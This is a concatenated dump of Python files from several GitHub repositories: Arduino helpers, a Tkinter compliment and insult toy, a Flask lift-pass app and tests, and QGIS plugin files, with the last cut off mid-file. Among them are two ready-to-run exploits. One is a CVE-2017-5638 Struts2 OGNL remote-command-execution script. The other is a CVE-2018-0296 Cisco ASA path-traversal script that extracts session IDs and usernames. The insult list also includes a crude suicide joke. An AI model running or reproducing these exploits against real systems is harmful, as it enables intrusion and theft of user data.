# between 0 and 1
y_ = arduino_map(y, min_arduino, max_arduino, 0.0, 1.0)
return [y_]
# Converts convolutional neural network outputs
# to raw outputs
def cnn_to_raw(y, min_arduino=40.0, max_arduino=150.0):
# Get highest index value and map
# it back
y_ = y[np.argmax(y)]
# degrees to output
y_ = arduino_map(y_, 0.0, 1.0, min_arduino, max_arduino)
return y_
# Motor to RGB color based on speed
def raw_motor_to_rgb(x):
if x <= 90:
if x < 70:
return (255, 0, 0)
elif x < 80:
return (255, 165, 0)
else:
return (0, 255, 0)
elif x > 90:
if x > 120:
return (255, 0, 0)
elif x > 110:
return (255, 165, 0)
else:
return (0, 255, 0)
``` |
{
"source": "3KFreaky/Python",
"score": 3
} |
#### File: 3KFreaky/Python/Tkinter Work.py
```python
import tkinter
top = tkinter.Tk()
top.title("Click A Button!")
import random
def clear():
print("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n")
def compliment():
compliment = random.randint(1,9)
if compliment == 1:
print("Your Beautiful!")
elif compliment == 2:
print("Your Smile is Amazing!")
elif compliment == 3:
print("You look great today!")
elif compliment == 4:
print("You're a smart cookie!")
elif compliment == 5:
print("I like your style!")
elif compliment == 6:
print("You are the most perfect you there is!")
elif compliment == 7:
print("You're an awesome friend!")
elif compliment == 8:
print("You light up the room!")
elif compliment == 9:
print("You're all that and a super-size bag of chips!")
def insult():
insult = random.randint(1,9)
if insult == 1:
print("You’re a good example of why some animals eat their young.")
elif insult == 2:
print("I didn’t attend Your funeral, but I sent a nice letter saying I approved of it.")
elif insult == 3:
print("I thought men like you shot themselves.")
elif insult == 4:
print("I can’t believe that out of 100,000 sperm, you were the quickest.")
elif insult == 5:
print("I like your style! where did you steal it?")
elif insult == 6:
print("We all have to wait in line to hate you.")
elif insult == 7:
print("You seem to have descended from the chimpanzee later than everyone else")
elif insult == 8:
print("You must have been born on a highway, because that's where most accidents happen.")
elif insult == 9:
print("You're so ugly Hello Kitty said goodbye to you.")
def THECODE():
count = 0
while count != 1:
print("739823748923748923743289472389472389472347398237489237489237432894723894723894723473982374892374892374328947238947238947234739823748923748923743289472389472")
print("347234732894823904848239048239048239482393472347328948239048482390482390482394823934723473289482390484823904823904823948239347234732894823904848239048239048")
print("739823748923748923743289472389472389472347398237489237489237432894723894723894723473982374892374892374328947238947238947234739823748923748923743289472389472")
print("483290483258464303485349493490593405934054832904832584643034853494934905934059340548329048325846430348534949349059340593405483290483258464303485349493490593")
print("347234732894823904848239048239048239482393472347328948239048482390482390482394823934723473289482390484823904823904823948239347234732894823904848239048239048")
A = tkinter.Button(top, text ="Compliment", command = compliment)
B = tkinter.Button(top, text="CLEAR", command = clear)
C = tkinter.Button(top, text ="Insult", command = insult)
D = tkinter.Button(top, text = "THE CODE", command = THECODE)
A.pack()
C.pack()
D.pack()
B.pack()
top.mainloop()
#copyright <NAME> 2017
``` |
{
"source": "3kwa/datoms",
"score": 2
} |
#### File: 3kwa/datoms/test_datoms.py
```python
import doctest
import datoms
def test_module_doctest():
failure_count, _ = doctest.testmod(datoms)
assert failure_count == 0
``` |
{
"source": "3kwa/ipython",
"score": 2
} |
#### File: html/notebook/fabfile.py
```python
from fabric.api import local,lcd
from fabric.utils import abort
import os
static_dir = 'static'
components_dir = os.path.join(static_dir,'components')
def test_component(name):
if not os.path.exists(os.path.join(components_dir,name)):
components()
def components():
"""install components with bower"""
with lcd(static_dir):
local('bower install')
def css(minify=True):
"""generate the css from less files"""
test_component('bootstrap')
test_component('less.js')
if minify not in ['True', 'False', True, False]:
abort('minify must be Boolean')
minify = (minify in ['True',True])
min_flag= '-x' if minify is True else ''
with lcd(static_dir):
local('lessc {min_flag} less/style.less css/style.min.css'.format(min_flag=min_flag))
``` |
{
"source": "3l3n01/lift-pass",
"score": 3
} |
#### File: lift-pass/src/app.py
```python
import math
from datetime import datetime
from flask import Flask, jsonify, request
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'
db = SQLAlchemy(app)
class Price(db.Model):
id = db.Column(db.Integer, primary_key=True)
type = db.Column(db.String(80), unique=True, nullable=False)
cost = db.Column(db.Integer, nullable=False)
def __repr__(self):
return '<Price %s: %d>' % (self.type, self.cost)
class Holiday(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80), unique=True, nullable=False)
date = db.Column(db.Date, nullable=False)
def __repr__(self):
return '<Holiday %s: %s>' % (self.name, self.date)
@app.route('/prices')
def prices():
price = Price.query.filter_by(type=request.args.get('type')).first()
if int(request.args.get('age')) < 6:
return jsonify({'cost': 0})
else:
if request.args.get('type') != 'Night':
holidays = Holiday.query.all()
is_holiday = False
reduction = 0
for holiday in holidays:
if request.args.get('date'):
date = datetime.strptime(
request.args.get('date'), '%Y-%m-%d').date()
if date == holiday.date:
is_holiday = True
if not is_holiday and datetime.strptime(request.args.get('date'), '%Y-%m-%d').weekday() == 0:
reduction = 35
if int(request.args.get('age')) < 15:
return jsonify({'cost': math.ceil(price.cost * 0.7)})
else:
if not request.args.get('age'):
cost = price.cost * (1 - reduction / 100)
return jsonify({'cost': math.ceil(cost)})
else:
if int(request.args.get('age')) > 64:
cost = price.cost * 0.75 * (1 - reduction / 100)
return jsonify({'cost': math.ceil(cost)})
else:
cost = price.cost * (1 - reduction / 100)
return jsonify({'cost': math.ceil(cost)})
else:
if int(request.args.get('age')) >= 6:
if int(request.args.get('age')) > 64:
return jsonify({'cost': math.ceil(price.cost * 0.4)})
else:
return jsonify({'cost': price.cost})
else:
return jsonify({'cost': 0})
```
#### File: 3l3n01/lift-pass/test_app.py
```python
import pytest
from src.app import app
def test_base():
with app.test_client() as client:
response = client.get(
'/prices', query_string={'age': 20, 'date': '2020-05-08', 'type': 'Jour'})
json_data = response.get_json()
assert json_data['cost'] == 35
def test_night():
with app.test_client() as client:
response = client.get(
'/prices', query_string={'age': 20, 'date': '2020-05-08', 'type': 'Night'})
json_data = response.get_json()
assert json_data['cost'] == 19
def test_child():
with app.test_client() as client:
response = client.get(
'/prices', query_string={'age': 5, 'date': '2020-05-08', 'type': 'Jour'})
json_data = response.get_json()
assert json_data['cost'] == 0
def test_elderly():
with app.test_client() as client:
response = client.get(
'/prices', query_string={'age': 65, 'date': '2020-05-08', 'type': 'Jour'})
json_data = response.get_json()
assert json_data['cost'] == 27
def test_elderly_night():
with app.test_client() as client:
response = client.get(
'/prices', query_string={'age': 65, 'date': '2020-05-08', 'type': 'Night'})
json_data = response.get_json()
assert json_data['cost'] == 8
def test_holiday():
with app.test_client() as client:
response = client.get(
'/prices', query_string={'age': 20, 'date': '2020-12-25', 'type': 'Jour'})
json_data = response.get_json()
assert json_data['cost'] == 35
def test_monday():
with app.test_client() as client:
response = client.get(
'/prices', query_string={'age': 20, 'date': '2020-05-04', 'type': 'Jour'})
json_data = response.get_json()
assert json_data['cost'] == 23
``` |
{
"source": "3lackrush/PoC-Bank",
"score": 2
} |
#### File: PoC-Bank/CVE-2017-5638/CVE-2017-5638.py
```python
import urllib2
import httplib
class PoC(object):
'''
CVE-2017-5638 Struct2 S2-045 Proof of Concept
'''
def __init__(self, url):
'''
Initialize
'''
self.url = url
self.cmd = 'echo EvilCorp'
def _generatePayload(self):
'''
Generate Payload.
'''
payload = "%{(#_='multipart/form-data')."
payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(#cmd='%s')." % self.cmd
payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
payload += "(#ros.flush())}"
return payload
def run(self):
'''
S2-045 Check!
'''
payload = self._generatePayload()
url = self.url
try:
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
request = urllib2.Request(url, headers=headers)
page = urllib2.urlopen(request).read()
except httplib.IncompleteRead, e:
page = e.partial
if "EvilCorp" in page:
print("Site is vulnerable with S2-045!")
else:
print("Site is not Vulnerable!")
if __name__ == '__main__':
obj1 = PoC('http://192.168.0.104/memoshow.action?id=3')
obj1.run()
```
#### File: PoC-Bank/CVE-2018-0296/cisco_asa.py
```python
import requests
import sys
import urlparse
import os
import re
requests.packages.urllib3.disable_warnings()
url = sys.argv[1]
regexSess = r"([0-9])\w+'"
regexUser = r"(user:)\w([^']*)"
dir_path = os.path.dirname(os.path.realpath(__file__))
filelist_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/"
CSCOE_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b"
active_sessions = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"
logon = "/+CSCOE+/logon.html"
def banner():
print("""
Cisco ASA - Path Traversal
CVE-2018-0296
Author: <NAME>(@yassineaboukir)
""")
def is_asa(): # Verify target is using Cisco ASA
try:
is_cisco_asa = requests.get(urlparse.urljoin(url,logon), verify=False, allow_redirects=False)
except:
print("[-] Couldn't establish connection with the target host.")
sys.exit(1)
if "webvpnLang" in is_cisco_asa.cookies:
pass
else:
print("[-] Couldn't confirm it's Cisco ASA. E.g: https://vpn.example.com/+CSCOE+/logon.html\n")
sys.exit(1)
def extract_info():
#Extract directory content
try:
filelist_r = requests.get(urlparse.urljoin(url,filelist_dir), verify=False, timeout = 15)
CSCOE_r = requests.get(urlparse.urljoin(url,CSCOE_dir), verify=False, timeout = 15)
active_sessions_r = requests.get(urlparse.urljoin(url,active_sessions), verify=False, timeout = 15)
if str(filelist_r.status_code) == "200":
with open(urlparse.urlparse(url).hostname + ".txt", "w") as cisco_dump:
cisco_dump.write("[+] Directory: \n {}\n[+] +CSCEO+ Directory:\n {}\n[+] Active sessions:\n {}\n[+] Active Users:\n".format(filelist_r.text, CSCOE_r.text, active_sessions_r.text))
#Extract user list
matches_sess = re.finditer(regexSess, active_sessions_r.text)
for match_sess in matches_sess:
active_users_r = requests.get(urlparse.urljoin(url,"/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/" + str(match_sess.group().strip("'"))), verify=False, timeout = 15)
matches_user = re.finditer(regexUser, active_users_r.text)
for match_user in matches_user:
cisco_dump.write(match_user.group() + "\n")
print("[+] Host is vulnerable! The dump was saved to {}".format(dir_path))
else:
print("[-] The host doesn't appear to be vulnerable.")
except:
print("[-] Connection timed out! Could be on purpose (Timeout set to 15s) to prevent DoS'ing the server, so please run the script one last time to confirm.")
sys.exit(1)
if __name__ == '__main__':
banner()
is_asa()
extract_info()
``` |
{
"source": "3l-d1abl0/Utilities",
"score": 2
} |
#### File: Utilities/DurationCheck/durationcheck.py
```python
from pathlib import Path
import argparse
import subprocess32 as subprocess
import os
import sys
def getDuration(filename):
command = [
'ffprobe',
'-v',
'error',
'-show_entries',
'format=duration',
'-of',
'default=noprint_wrappers=1:nokey=1',
filename
]
try:
#output = check_output( command, stderr=STDOUT ).decode()
filename =str(filename)
#print(filename)
output = subprocess.run(["ffprobe", "-v", "error", "-show_entries",
"format=duration", "-of",
"default=noprint_wrappers=1:nokey=1", filename],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
#output = subprocess.check_output(output).decode()
except subprocess.CalledProcessError as e:
#output = e.output.decode()
output = float(result.stdout)
if output.stdout.strip("\n")=="N/A":
return '0.0'
else:
return output.stdout.strip("\n")
def folderDuration(folderPath):
duration =0.0
for path in Path(folderPath).iterdir():
info = path.stat()
if os.path.isdir(str(path)):
curr_scope = float(folderDuration(path))
duration += curr_scope
print("{}/ --> {}".format( path, curr_scope) )
elif str(path).endswith('.mp4') or str(path).endswith('.avi'):
curr_scope = float(getDuration(path))
duration += curr_scope
print("{} --> {}".format( path, curr_scope) )
return duration
if __name__=="__main__":
ap = argparse.ArgumentParser()
ap.add_argument("-f", "--path", required=True, help=" \"path\" to target folder")
args = vars(ap.parse_args())
FOLDER_PATH = str(args["path"])
print("\nScanning Folder :\n{} ... \n".format(FOLDER_PATH))
if not os.path.isdir(FOLDER_PATH):
print("** Please enter a valid Folder Path **")
exit()
elif os.path.exists(os.path.dirname(FOLDER_PATH))==False:
print("** This folder path does not exist **")
exit()
TOTAL_MIN=0
TOTAL_SEC=0
duration = folderDuration(FOLDER_PATH)
print(duration)
TOTAL_SEC += int(duration%60)
TOTAL_MIN += int(duration/60) + int(TOTAL_SEC/60)
TOTAL_SEC = int(TOTAL_SEC%60)
print("Total Duration: {}hr {}min {}secs ".format(TOTAL_MIN/60, TOTAL_MIN%60, TOTAL_SEC))
``` |
{
"source": "3ldr0n/elzring",
"score": 3
} |
#### File: elzring/core/game.py
```python
import sys
import pygame
from player import Player
from menu import Menu
from music import Music
from rooms import OpeningBeachRoom, FollowingBeach
from gamesettings import GameSettings as gs
from gamesettings import GameStates
from textinput import TextInput
class Game:
def __init__(self):
pygame.init()
pygame.display.set_caption("Elzring")
self.screen = pygame.display.set_mode(gs.SCREEN_SIZE)
self.state = GameStates.START_MENU
self.clock = pygame.time.Clock()
self.FPS = 30
def _set_screen(self):
self.screen.fill(gs.BACKGROUND)
def draw_grid(self):
for x in range(0, gs.SCREEN_WIDTH, gs.TILESIZE):
pygame.draw.line(self.screen, gs.LIGHT_GREY,
(x, 0), (x, gs.SCREEN_HEIGHT))
for y in range(0, gs.SCREEN_HEIGHT, gs.TILESIZE):
pygame.draw.line(self.screen, gs.LIGHT_GREY,
(0, y), (gs.SCREEN_WIDTH, y))
def name_input(self, inputs, events):
"""Creates text input dialogue for the name input.
Parameters
----------
inputs: dict
Dict of inputs.
events: list
Events queue.
"""
input_name_text = "Qual o seu nome?"
font = pygame.font.SysFont(None, gs.TILESIZE*5)
rendered_font = font.render(input_name_text, True, gs.WHITE)
self.screen.blit(
rendered_font, (1000 - rendered_font.get_rect().width,
0 + rendered_font.get_rect().height))
if inputs["name_input"].update_text(events):
self.player.set_name(inputs["name_input"].get_input())
self.state = GameStates.PLAYING
inputs["name_input"].draw(self.screen)
def load_rooms(self):
opening_beach_room = OpeningBeachRoom()
opening_beach_room.load_map()
following_beach_room = FollowingBeach()
following_beach_room.load_map()
rooms = {
"current_room": opening_beach_room,
"opening_beach_room": opening_beach_room,
"following_beach_room": following_beach_room
}
return rooms
def update_sprites(self):
self.tile_group.update()
self.characters_sprites.update()
self.collision_tile_group.update()
def empty_sprites(self):
self.tile_group.empty()
self.collision_tile_group.empty()
self.trespassing_tile_group.empty()
def run(self):
self.player = Player(self)
self.characters_sprites = pygame.sprite.Group(self.player)
menu = Menu(self.screen)
name_input = TextInput(
gs.SCREEN_WIDTH // 2 - (gs.TILESIZE * 18) // 2,
gs.SCREEN_HEIGHT // 2 - (gs.TILESIZE * 4) // 2,
18, 4)
inputs = {
"name_input": name_input
}
rooms = self.load_rooms()
self.tile_group = pygame.sprite.Group()
self.collision_tile_group = pygame.sprite.Group()
self.trespassing_tile_group = pygame.sprite.Group()
while True:
self.clock.tick(self.FPS)
self._set_screen()
events = pygame.event.get()
for event in events:
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
if self.state == GameStates.START_MENU:
menu.run(self)
for event in events:
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_RETURN:
self.state = GameStates.SET_NAME
elif self.state == GameStates.SET_NAME:
self.name_input(inputs, events)
elif self.state == GameStates.PLAYING:
rooms["current_room"].render(self, self.player, self.screen)
self.tile_group.draw(self.screen)
self.characters_sprites.draw(self.screen)
self.player.update()
self.empty_sprites()
pygame.event.pump()
pygame.display.flip()
```
#### File: elzring/core/items.py
```python
import pygame
from gamesettings import GameSettings as gs
class Item(pygame.sprite.Sprite):
def __init__(self, name, value, description):
super().__init__()
self.name = name
self.value = value
self.description = description
class Weapon(Item):
def __init__(self, name, value, description, damage):
super().__init__(name, value, description)
self.base_damage = damage
class Inventory:
pass
```
#### File: elzring/core/player.py
```python
import os
import pygame
from gamesettings import GameSettings as gs
class Player(pygame.sprite.Sprite):
def __init__(self, game):
super().__init__()
self.game = game
self.width = 32
self.height = 64
self.spritesheet = pygame.image.load(
os.path.join(gs.ASSETS, "characters/main.png")).convert_alpha()
self.__walk_up_images = self.__set_walk_up_images()
self.__walk_up_index = 0
self.__walk_down_images = self.__set_walk_down_images()
self.__walk_down_index = 0
self.__walk_right_images = self.__set_walk_right_images()
self.__walk_right_index = 0
self.__walk_left_images = self.__set_walk_left_images()
self.__walk_left_index = 0
# Base values used to start the sprite rect object.
self.set_idle_image(0, 0)
self.name = None
self.hp = 100
self.maxhp = 100
self.inventory = []
self.current_room = None
self.speed = gs.TILESIZE / 5
def __set_walk_up_images(self):
"""Cuts all the necessary images for the walking up animation. """
walk_up_images = []
for i in range(9):
self.spritesheet.set_clip(pygame.Rect(
16+i*self.width, 8*self.height, self.width, self.height)),
walk_up_image = self.spritesheet.subsurface(
self.spritesheet.get_clip())
walk_up_images.append(walk_up_image)
return walk_up_images
def __set_walk_down_images(self):
"""Cuts all the necessary images for the walking down animation. """
walk_down_images = []
for i in range(9):
self.spritesheet.set_clip(pygame.Rect(
16+i*self.width, 10*self.height, self.width, self.height)),
walk_down_image = self.spritesheet.subsurface(
self.spritesheet.get_clip())
walk_down_images.append(walk_down_image)
return walk_down_images
def __set_walk_right_images(self):
"""Cuts all the necessary images for the walking right animation. """
walk_right_images = []
for i in range(9):
self.spritesheet.set_clip(pygame.Rect(
16+i*self.width, 11*self.height, self.width, self.height)),
walk_right_image = self.spritesheet.subsurface(
self.spritesheet.get_clip())
walk_right_images.append(walk_right_image)
return walk_right_images
def __set_walk_left_images(self):
"""Cuts all the necessary images for the walking left animation. """
walk_left_images = []
for i in range(9):
self.spritesheet.set_clip(pygame.Rect(
16+i*self.width, 9*self.height, self.width, self.height)),
walk_left_image = self.spritesheet.subsurface(
self.spritesheet.get_clip())
walk_left_images.append(walk_left_image)
return walk_left_images
def set_current_room(self, room):
self.current_room = room
def set_name(self, name):
self.name = name
def set_idle_image(self, x=None, y=None):
"""Set the player's idle image.
Parameters
----------
x: int
x axis position.
y: int
y axis position.
"""
if x is None and y is None:
x = self.rect.x
y = self.rect.y
self.image = self.__walk_down_images[0]
self.rect = self.image.get_rect()
self.rect.x = x
self.rect.y = y
def set_walking_up_image(self):
self.image = self.__walk_up_images[self.__walk_up_index]
rect = self.image.get_rect()
rect.x = self.rect.x
rect.y = self.rect.y
self.rect = rect
def set_walking_down_image(self):
self.image = self.__walk_down_images[self.__walk_down_index]
rect = self.image.get_rect()
rect.x = self.rect.x
rect.y = self.rect.y
self.rect = rect
def set_walking_right_image(self):
self.image = self.__walk_right_images[self.__walk_right_index]
rect = self.image.get_rect()
rect.x = self.rect.x
rect.y = self.rect.y
self.rect = rect
def set_walking_left_image(self):
self.image = self.__walk_left_images[self.__walk_left_index]
rect = self.image.get_rect()
rect.x = self.rect.x
rect.y = self.rect.y
self.rect = rect
def __increment_walk_up_index(self):
"""Increments correctly the animation index, if the value is too
high the methods sets the index back to zero.
"""
self.__walk_up_index = (
self.__walk_up_index + 1) % len(self.__walk_up_images)
def __increment_walk_down_index(self):
"""Increments correctly the animation index, if the value is too
high the methods sets the index back to zero.
"""
self.__walk_down_index = (
self.__walk_down_index + 1) % len(self.__walk_down_images)
def __increment_walk_right_index(self):
"""Increments correctly the animation index, if the value is too
high the methods sets the index back to zero.
"""
self.__walk_right_index = (
self.__walk_right_index + 1) % len(self.__walk_right_images)
def __increment_walk_left_index(self):
"""Increments correctly the animation index, if the value is too
high the methods sets the index back to zero.
"""
self.__walk_left_index = (
self.__walk_left_index + 1) % len(self.__walk_left_images)
def is_alive(self):
"""Check if user is alive.
Returns
-------
bool
Life bigger than zero.
"""
return self.hp > 0
def check_border(self):
if self.rect.x >= gs.SCREEN_WIDTH - self.width:
self.rect.x = gs.SCREEN_WIDTH - self.width
if self.rect.x <= gs.SCREEN_BORDER:
self.rect.x = gs.SCREEN_BORDER
if self.rect.y <= gs.SCREEN_BORDER:
self.rect.y = gs.SCREEN_BORDER
if self.rect.y + self.height > gs.SCREEN_HEIGHT - gs.SCREEN_BORDER:
self.rect.y = gs.SCREEN_HEIGHT - self.height - gs.SCREEN_BORDER
def collide_with_tiles(self):
"""Check if the user is colliding with any of the sprites loaded in the
collision tiles group.
"""
for tile in self.game.collision_tile_group:
if pygame.sprite.collide_rect(self, tile):
return True
return False
def pass_to_other_room(self):
for tile in self.game.trespassing_tile_group:
if pygame.sprite.collide_rect(self, tile):
return True
return False
def get_item(self, item):
self.inventory.append(item)
def update(self):
"""Handles user movement. """
key = pygame.key.get_pressed()
if key[pygame.K_RIGHT]:
self.__increment_walk_right_index()
self.set_walking_right_image()
self.rect.x += self.speed
if self.collide_with_tiles():
self.rect.x -= self.speed
if key[pygame.K_LEFT]:
self.__increment_walk_left_index()
self.set_walking_left_image()
self.rect.x -= self.speed
if self.collide_with_tiles():
self.rect.x += self.speed+2
if key[pygame.K_UP]:
self.__increment_walk_up_index()
self.set_walking_up_image()
self.rect.y -= self.speed
if self.collide_with_tiles():
self.rect.y += self.speed
if key[pygame.K_DOWN]:
self.__increment_walk_down_index()
self.set_walking_down_image()
self.rect.y += self.speed
if self.collide_with_tiles():
self.rect.y -= self.speed
if 1 not in key:
self.set_idle_image()
def save_info(self):
pass
``` |
{
"source": "3lectrologos/comet",
"score": 3
} |
#### File: comet/comet/mutation_data.py
```python
def load_mutation_data(filename, patientFile=None, geneFile=None, minFreq=0, subtypeFile=None):
"""Loads the mutation data in the given file.
:type filename: string
:param filename: Location of mutation data file.
:type patient_file: string
:param patient_file: Location of patient (whitelist) file.
:type gene_file: string
:param gene_file: Location of gene (whitelist) file.
:rtype: Tuple
**Returns:**
* **m** (*int*) - number of patients.
* **n** (*int*) - number of genes.
* **genes** (*list*) - genes in the mutation data.
* **patients** (*list*) - patients in the mutation data.
* **geneToCases** (*dictionary*) - mapping of genes to the patients in which they are mutated.
* **patientToGenes** (*dictionary*) - mapping of patients to the genes they have mutated.
* **subtypes** (*list*) - list of unique subtypes.
"""
# Load the patient whitelist (if applicable)
if patientFile:
with open(patientFile) as f:
patients = set( l.rstrip().split()[0] for l in f if not l.startswith("#") )
else:
patients = None
# Load the subtype information (if applicable)
from collections import defaultdict
subtypeDict = defaultdict( lambda: None, dict() )
subtypes = set()
if subtypeFile:
subtypeDict = defaultdict( lambda: None, dict() )
subtypes = set()
with open( subtypeFile ) as f:
sts = [ l.rstrip().split( '\t' ) for l in f if not l.startswith( '#' ) ]
for p, s in sts:
subtypeDict[p] = s
subtypes.add( s )
# Load the gene whitelist (if applicable)
if geneFile:
with open(geneFile) as f:
genes = set( l.rstrip().split()[0] for l in f if not l.startswith("#") )
genes |= subtypes
else:
genes = set()
# Parse the mutation matrix
geneToCases, patientToGenes = defaultdict(set), defaultdict(set)
with open(filename) as f:
arrs = [ l.rstrip().split("\t") for l in f if not l.startswith("#") ]
for arr in arrs:
patient, mutations = arr[0], set(arr[1:])
if subtypeDict[patient]:
mutations |= set( s for s in subtypes if subtypeDict[patient] != s )
if not patients or patient in patients:
if genes: mutations &= genes
patientToGenes[patient] = mutations
for gene in mutations:
geneToCases[gene].add(patient)
genes = geneToCases.keys()
# Remove genes with fewer than min_freq mutations
toRemove = [ g for g in genes if len(geneToCases[g]) < minFreq ]
for g in toRemove:
for p in geneToCases[g]:
patientToGenes[p].remove(g)
del geneToCases[g]
genes.remove(g)
# Format and return output
genes, patients = list(geneToCases.keys()), list(patientToGenes.keys())
m, n = len(genes), len(patients)
return m, n, genes, patients, geneToCases, patientToGenes, subtypes
def adj_dict_to_lists(xs, ys, d):
"""Convert a dictionary of x -> y to a list of lists, where
each x corresponds to a list of indices of y."""
M = []
for x, y_list in d.items():
M.append( [ list(ys).index(y) for y in y_list ] )
return M
def convert_mutations_to_C_format(m, n, genes, patients, geneToCases, patientToGenes, subtypes=None):
"""We convert the dictionaries to list of lists so they're easier to parse in C."""
if subtypes:
newg = set(genes).difference(set(subtypes))
genes = list(newg)
for s in subtypes:
genes.append(s)
#genes += subtypes
geneToIndex = dict(zip(genes, range(m)))
indexToGene = dict(zip(range(m), genes))
iPatientToGenes = adj_dict_to_lists(patients, genes, patientToGenes)
iGeneToCases = adj_dict_to_lists(genes, patients, geneToCases)
geneToNumCases = [ len(geneToCases[g]) for g in genes ]
return iPatientToGenes, iGeneToCases, geneToNumCases, geneToIndex, indexToGene
``` |
{
"source": "3lixy/selinux",
"score": 2
} |
#### File: selinux/selinux/__init__.py
```python
__author__ = """<NAME>"""
__email__ = '<EMAIL>'
__version__ = '0.1.5'
import json
import os
import platform
import subprocess
import sys
try:
from imp import reload
except ImportError: # py34+
from importlib import reload
class add_path(object):
"""Context manager for adding path to sys.path"""
def __init__(self, path):
self.path = path
def __enter__(self):
sys.path.insert(0, self.path)
def __exit__(self, exc_type, exc_value, traceback):
try:
sys.path.remove(self.path)
except ValueError:
pass
def is_selinux_enabled():
return 0
def is_selinux_mls_enabled():
return 0
# selinux python library should be loaded only on selinux systems
if platform.system() == 'Linux' and os.path.isfile('/etc/selinux/config'):
def add_location(location):
"""Try to add a possble location for the selinux module"""
if os.path.isdir(os.path.join(location, 'selinux')):
with add_path(location):
# And now we replace ourselves with the original selinux module
reload(sys.modules['selinux'])
# Validate that we can perform libselinux calls
if sys.modules['selinux'].is_selinux_enabled() not in [0, 1]:
raise RuntimeError("is_selinux_enabled returned error.")
return True
return False
def get_system_sitepackages():
"""Get sitepackage locations from sytem python"""
system_python = "/usr/bin/python%s" % \
platform.python_version_tuple()[0]
fnull = open(os.devnull, 'w')
try:
system_sitepackages = json.loads(
subprocess.check_output([
system_python, "-c",
"import json, site; print(json.dumps(site.getsitepackages()))"
], stderr=fnull # no need to print error as it will confuse users
).decode("utf-8")
)
except subprocess.CalledProcessError:
# Centos/RHEL 6 python2 does not seem to have site.getsitepackages
system_python_info = json.loads(
subprocess.check_output([
system_python, "-c",
"import json, sys; print(json.dumps([sys.prefix, sys.exec_prefix, sys.version_info[:2],"
" sys.platform]))"
]
).decode("utf-8")
)
system_prefixes = [
system_python_info[0],
system_python_info[1]
]
system_version_info = system_python_info[2]
# system_platform = system_python_info[3] # this was used in a couple of getsitepackages versions
system_sitepackages = getsitepackages(system_prefixes, tuple(system_version_info))
fnull.close()
return system_sitepackages
# Taken directly from python github https://github.com/python/cpython/blob/master/Lib/site.py
def getsitepackages(prefixes, system_version_info):
"""Returns a list containing all global site-packages directories.
For each directory present in ``prefixes`` (or the global ``PREFIXES``),
this function will find its `site-packages` subdirectory depending on the
system environment, and will return a list of full paths.
"""
sitepackages = []
for lib_type in ['lib', 'lib64']: # centos/rhel also use lib64
seen = set()
for prefix in prefixes:
if not prefix or prefix in seen:
continue
seen.add(prefix)
if os.sep == '/':
sitepackages.append(os.path.join(prefix, lib_type,
"python%d.%d" % system_version_info,
"site-packages"))
else:
sitepackages.append(prefix)
sitepackages.append(os.path.join(prefix, "lib", "site-packages"))
return sitepackages
def check_system_sitepackages():
"""Try add selinux module from any of the python site-packages"""
success = False
system_sitepackages = get_system_sitepackages()
for candidate in system_sitepackages:
success = add_location(candidate)
if success:
break
if not success:
raise Exception("Failed to detect selinux python bindings at %s. Is libselinux-python installed?" %
system_sitepackages)
check_system_sitepackages()
``` |
{
"source": "3liz/QgisCadastrePlugin",
"score": 2
} |
#### File: cadastre/server/tools.py
```python
__email__ = '<EMAIL>'
import configparser
from pathlib import Path
from qgis.core import Qgis, QgsMessageLog
def version() -> str:
""" Returns the plugin current version. """
file_path = Path(__file__).parent.parent.joinpath('metadata.txt')
config = configparser.ConfigParser()
try:
config.read(file_path, encoding='utf8')
except UnicodeDecodeError:
# Issue LWC https://github.com/3liz/lizmap-web-client/issues/1908
# Maybe a locale issue ?
# Do not use logger here, circular import
# noinspection PyTypeChecker
QgsMessageLog.logMessage(
"Error, an UnicodeDecodeError occurred while reading the metadata.txt. Is the locale "
"correctly set on the server ?",
"cadastre", Qgis.Critical)
return 'NULL'
else:
return config["general"]["version"]
```
#### File: cadastre/tests/test_import_data.py
```python
import unittest
import psycopg2
from qgis.core import QgsCoordinateReferenceSystem, QgsProviderRegistry
from qgis.utils import iface
from cadastre.dialogs.import_dialog import CadastreImportDialog
from cadastre.tools import plugin_test_data_path
class TestImportData(unittest.TestCase):
def test_import(self):
"""Test to import data into a PostgreSQL database. """
# Not the best test, it's using the UI QDialog and iface
dialog = CadastreImportDialog(iface)
schema = "cadastre"
# Set postgis
